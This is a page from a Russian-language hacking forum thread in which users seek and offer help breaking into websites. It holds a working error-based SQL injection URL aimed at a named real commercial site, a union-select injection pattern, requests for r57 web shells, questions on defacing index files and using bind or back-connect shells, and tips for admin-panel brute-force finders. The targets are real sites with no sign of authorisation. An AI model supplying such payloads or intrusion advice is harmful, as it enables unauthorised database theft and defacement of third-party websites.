Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
    колонки подбираются без проблем, но информацию не выдаёт
    подумал может фильт заменял union+select как только можно, нет...
    слышал такая ситуация уже разбиралась, но ответа не нащёл(
    подскажит кто?
     
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    выложи линк посмотрим...
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    плохо искал если не нашел >>>>>
     
  4. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Так проведем простой эксперимент: залей на сервак простой скриптик с таким содержанием:
    Code:
    <?phpinfo();?>
    Запроси его через web. Какое значение имеет параметр safe_mode?
     
    1 person likes this.
  5. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Запросил.

    Local value: safe_mod on, + ограничения с помощью open_basedir.
    Master value :safe_mod off, open_basedir: no_value

    Насколько я понимаю на master value не стоит обращать внимание? Это параметры для рута?
     
  6. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Привет, друзья.
    А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
     
    _________________________
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    https://forum.antichat.ru/threadnav12123-1-10.html
    https://forum.antichat.ru/thread23501.html
     
    _________________________
    1 person likes this.
  8. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Спасибо!
     
    _________________________
  9. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    подсказывали подсказывали, не получилось ничего(
    помогаем.. плыз
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.sweetstems.com.au/product.php?id=82+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
    1 person likes this.
  11. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    Konqi благодарен
     
    #14431 Koren, 10 Aug 2010
    Last edited: 10 Aug 2010
    1 person likes this.
  12. legaljo

    legaljo Member

    Joined:
    27 Jul 2010
    Messages:
    195
    Likes Received:
    26
    Reputations:
    7

    Спаасибо
     
    1 person likes this.
  13. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    del...
     
    #14433 Koren, 10 Aug 2010
    Last edited: 11 Aug 2010
  14. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Созрело еще несколько вопросов и просьба:

    Просьба:
    Кто-нибудь может поделится шеллами r57 eleckt edition и r57 antichat edition? Очень хочется попробовать их в действии, но все ссылки, которые я находил, были либо со стремых азиатских и буржуйских сайтов, либо просрочены в файлообменниках. Желательно, чтобы шеллы были не закодированы.


    Вопросы:
    1. Бывают такие ситуации, когда веб шелл работает с правами apache или nobody, а большинство файлов (тот же index.php) принадлежат доругому пользователю(чаще всего его название созвучно с доменным именем сайта), и права на запись установлены только для этого пользователя. В этих ситуациях есть способы правки индекса, кроме получения рута на серваке?

    2. Почему вообще веб шеллы на разных сайтах принадлежат различным пользователям? Просто раньше думал, что залитый вебшелл(на любой сайт) всегда будет иметь права apache, и все файлы в папке сайта будут тоже иметь права apache и с легкостью редактироваться.

    3. FTP аккаунт владельца сайта(если я его добуду) какие будет иметь права? Тоже на разных сайтах разные?

    4. При подключении к порту который я забиндил или же при подключении через бекконнект к атакуемому серверу, какие у меня будут права? Такие же как и у веб шелла? Какие это вообще дает преимущества, кроме потенциальной возможности запуска эксплоита с целью повышения прав?

    Извиняйте, если вопросы, которые я задаю, являются банальными или уже не раз обсуждались. Я честно искал ответы в гугле, но так ничего и не нашел.
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Получить права владельца файлов, например через ftp или ssh.

    Права apache(nobody,www,www-data и т.д.) только на серверах, где ServerApi Apache. Иначе, скрипты запускаются от пользователя сайта и принадлежат все файлы в папке сайта пользователю - это при Server Api CGI\FCGI

    Как правило, пользователя(владельца сайта)
     
    3 people like this.
  16. legaljo

    legaljo Member

    Joined:
    27 Jul 2010
    Messages:
    195
    Likes Received:
    26
    Reputations:
    7
    Помогите, есть ли какой-нибудь рабочий софт для поиска админки на сайте?
     
  17. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    IntelliTamper - сканер директорий.
    Reiluke AdminFinder - ищет админку, по средствам брута всех возможных адресов.
     
    1 person likes this.
  18. QDef

    QDef Member

    Joined:
    5 Jul 2010
    Messages:
    54
    Likes Received:
    9
    Reputations:
    0
    http://site.ru/text.php?page='

    Если это инъекция ,возможно ли как-то извлечь данные?
     
    #14438 QDef, 11 Aug 2010
    Last edited: 11 Aug 2010
  19. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    возможно, но только с линком)
     
    1 person likes this.
  20. r3df0x

    r3df0x Member

    Joined:
    26 May 2010
    Messages:
    150
    Likes Received:
    6
    Reputations:
    -3
    ArxScanSite - пользую эту!
     
    1 person likes this.
Thread Status:
Not open for further replies.